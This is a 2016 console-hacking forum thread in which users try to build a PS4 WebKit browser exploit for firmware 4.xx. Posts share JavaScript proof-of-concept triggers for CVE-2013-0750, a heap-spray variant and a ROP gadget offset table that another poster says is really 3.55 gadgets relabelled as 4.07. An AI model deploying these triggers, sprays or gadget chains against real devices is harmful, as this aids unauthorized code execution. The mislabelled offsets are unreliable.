Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.

The PS4Webkit Project: An Attempt to Fabricate a 4.xx PS4 Web Exploit

PS4 Jailbreaking       Thread starter kazookid0       Start date Dec 28, 2016 at 7:16 PM       54      

Are you willing to contribute to this project?

  • Yes

    Votes: 46 83.6%

  • No

    Votes: 9 16.4%
  • Total voters
    55
Status
Not open for further replies.
After lots of news articles about PS4 Linux and the fact it is not going to see a release because of drama; I got to the idea to make an exploit together with the community.

Presenting the PS4webkit project!
  • So what is this "project" all about?
My plan is to develop a webkit/userland exploit with the help of the whole community, it pretty unlikely to succeed but hey! we can always try.​
  • But how can I contribute?
Simple, if you have any research, write-up's, CVE's, code or anything that could be usefull to other contributors, commit it on the github or paste it into the comments on this thread​
  • Are there any rules you need to follow?
Just to keep all code clean and as stable as possible there are some thing's you must not do to the code:
  1. Add credit's to your code (Full ASCII banner are not allowed, but a single line comment mentioning you is allowed if you have written a big piece of code)
  2. Don't commit code if you don't know what it does, seriously, leave it to the real devs (if any will ever join :p)
  3. Post research and code in their respective branch
  • So where is the github?
The project github is located at https://github.com/kazookid0/PS4webkit

Let's try to make something out of it. (btw plz no hate i tried lol)​
The PS4Webkit Project An Attempt to Fabricate a 4.xx PS4 Web Exploit.jpg
 
Click to expand...
kazookid0
kazookid0
kazookid0

Comments

Seedlord said:
I can confirm @yota1979 for Firmware 4.05. But there is no Blackscreen after "undefined is not a function...." its loading a bit and going back to browser with blank html page page (the one with the exploit). The exploit writer says there are "three places that code can be excuted". Does anyone know how to do so?

So is this a working exploit? What can we do with them?
Click to expand...

Hi @Seedlord , as you tell , on the exploit that I have posted :

1) You are right when tell this
its loading a bit and going back to browser with blank html page

But (I have to test much more) in four case (I have to search how to reproduce every time) my browser freezee for 1/2 sec , after I have black screen , and after few seconds I have the error message.

I have 2 question :

1) How i insert code to execute when the browser crash (black screen?). In this case if the exploit is a webkit exploit how i verify? I have to try to insert a freebds exploit to test?

2) "Note that there are three places that code can be executed after the neutered check in this function, the begin and end parameter, and the value, which is converted in setRangeToValue." I'd also like to how i can change this value (not exactly how ma how and why I have to change)
 
Bumping this to see if there has been any progress / learning on this project. I don't have coding experience but still like to hear about whats been tried.
 
Hi, are someone tried with CVE-2013-0750?, I proved the next code in my PS4 4.07 and have the error "There is not enough free system memory."
Code: 
<html>
    <script type="text/javascript">

        function puff(x, n){
            while(x.length<n) x+=x;
            x = x.substring(0, n);
            return x;
        }

        var x = "1";
        var rep = "$1";

        x = puff(x, 1<<20);
        rep = puff(rep, 1<<16);
        y = x.replace(/(.+)/g, rep);
        alert(y.length);
    </script>
  
</html>
 
JorgeCLN said:
Hi, are someone tried with CVE-2013-0750?, I proved the next code in my PS4 4.07 and have the error "There is not enough free system memory."
Code: 
<html>
    <script type="text/javascript">

        function puff(x, n){
            while(x.length<n) x+=x;
            x = x.substring(0, n);
            return x;
        }

        var x = "1";
        var rep = "$1";

        x = puff(x, 1<<20);
        rep = puff(rep, 1<<16);
        y = x.replace(/(.+)/g, rep);
        alert(y.length);
    </script>
 
</html>
Click to expand...

you need a pointer into the memory
 
Hi @monastry, i'm computer systems engineer and developer but i dont have strong knowledge in hacks, i found some documents about this CVE, but im lost.

https://securitylab.disi.unitn.it/lib/exe/fetch.php?media=teaching:offtech:2014:report_la_spina_168100.pdf

Code: 
<html>
    <script type="text/javascript">
function puff( x , n ) {
 while ( x.length<n ) x+=x;
 x = x.substring( 0 , n );
 return x;
}

 function buggedReplace ( i ) {
 var x = unescape(”%u0c0c%u0c0c ”);
 var rep = ”$1”;
 x = puff(x , (1<<26)+i); // a l l o c a t e i b l o c k s o f 64 by t e s
 rep = puff(rep , 1<<7); // replace 64 times
 y = x.replace(/(.+ )/g, rep);
}

function exploitIt( ){
 //spray();
 buggedReplace(1);
}
</script>
</html>
 
JorgeCLN said:
Hi @monastry, i'm computer systems engineer and developer but i dont have strong knowledge in hacks, i found some documents about this CVE, but im lost.

https://securitylab.disi.unitn.it/lib/exe/fetch.php?media=teaching:offtech:2014:report_la_spina_168100.pdf
Code: 
<html>
    <script type="text/javascript">
function puff( x , n ) {
 while ( x.length<n ) x+=x;
 x = x.substring( 0 , n );
 return x;
}

 function buggedReplace ( i ) {
 var x = unescape(”%u0c0c%u0c0c ”);
 var rep = ”$1”;
 x = puff(x , (1<<26)+i); // a l l o c a t e i b l o c k s o f 64 by t e s
 rep = puff(rep , 1<<7); // replace 64 times
 y = x.replace(/(.+ )/g, rep);
}

function exploitIt( ){
 //spray();
 buggedReplace(1);
}
</script>
</html>
Click to expand...

this is what I am talking about it is for 3.55 but I am trying to find entry point for 4.07

Code: 
'PlayStation 4 4.07': {
        'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
        'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
        'pop rcx': new gadget(VTABLE, -0xab7d4c),
        'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
        'pop rdi': new gadget(VTABLE, -0x11d1d76),
        'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
        'pop rsi': new gadget(VTABLE, -0x88d954),
        'pop rdx': new gadget(VTABLE, -0xac2f8e),
        'pop rax': new gadget(VTABLE, -0x5e9bfd),
        'syscall': new gadget(VTABLE, -0x3dc1a6),
        'pop rsp': new gadget(VTABLE, -0x1abc011),
        'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
        'pop r8': new gadget(VTABLE, -0x15ca007),
        'pop r9': new gadget(VTABLE, -0x17202f1),
    },
ok you need the entry point or points to function of webkit from ps4 ,in the case above webkit will throw error "There is not enough free system memory." we need to allocate memory with out any error ,then write the payload and execute in the allocated memory

you can find webkit source code here https://doc.dl.playstation.net/doc/ps4-oss/webkit.html
 
monastry said:
this is what I am talking about it is for 3.55 but I am trying to find entry point for 4.07

Code: 
'PlayStation 4 4.07': {
        'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
        'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
        'pop rcx': new gadget(VTABLE, -0xab7d4c),
        'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
        'pop rdi': new gadget(VTABLE, -0x11d1d76),
        'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
        'pop rsi': new gadget(VTABLE, -0x88d954),
        'pop rdx': new gadget(VTABLE, -0xac2f8e),
        'pop rax': new gadget(VTABLE, -0x5e9bfd),
        'syscall': new gadget(VTABLE, -0x3dc1a6),
        'pop rsp': new gadget(VTABLE, -0x1abc011),
        'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
        'pop r8': new gadget(VTABLE, -0x15ca007),
        'pop r9': new gadget(VTABLE, -0x17202f1),
    },
ok you need the entry point or points to function of webkit from ps4 ,in the case above webkit will throw error "There is not enough free system memory." we need to allocate memory with out any error ,then write the payload and execute in the allocated memory

you can find webkit source code here https://doc.dl.playstation.net/doc/ps4-oss/webkit.html
Click to expand...
Looks familiar
 
monastry said:
this is what I am talking about it is for 3.55 but I am trying to find entry point for 4.07

Code: 
'PlayStation 4 4.07': {
        'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f),
        'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c),
        'pop rcx': new gadget(VTABLE, -0xab7d4c),
        'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40),
        'pop rdi': new gadget(VTABLE, -0x11d1d76),
        'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99),
        'pop rsi': new gadget(VTABLE, -0x88d954),
        'pop rdx': new gadget(VTABLE, -0xac2f8e),
        'pop rax': new gadget(VTABLE, -0x5e9bfd),
        'syscall': new gadget(VTABLE, -0x3dc1a6),
        'pop rsp': new gadget(VTABLE, -0x1abc011),
        'mov rax, qword ptr [rax]': new gadget(VTABLE, -0x238e98d),
        'pop r8': new gadget(VTABLE, -0x15ca007),
        'pop r9': new gadget(VTABLE, -0x17202f1),
    },
ok you need the entry point or points to function of webkit from ps4 ,in the case above webkit will throw error "There is not enough free system memory." we need to allocate memory with out any error ,then write the payload and execute in the allocated memory

you can find webkit source code here https://doc.dl.playstation.net/doc/ps4-oss/webkit.html
Click to expand...
They are just the 3.55 Gadgets and you have put 4.07 on it?.......Why?
 
Status
Not open for further replies.

PSXHAX Categories

PS4 Jailbreak Status
PS5 Jailbreak Status

Latest Forum Topics

Share This Page

Back
Top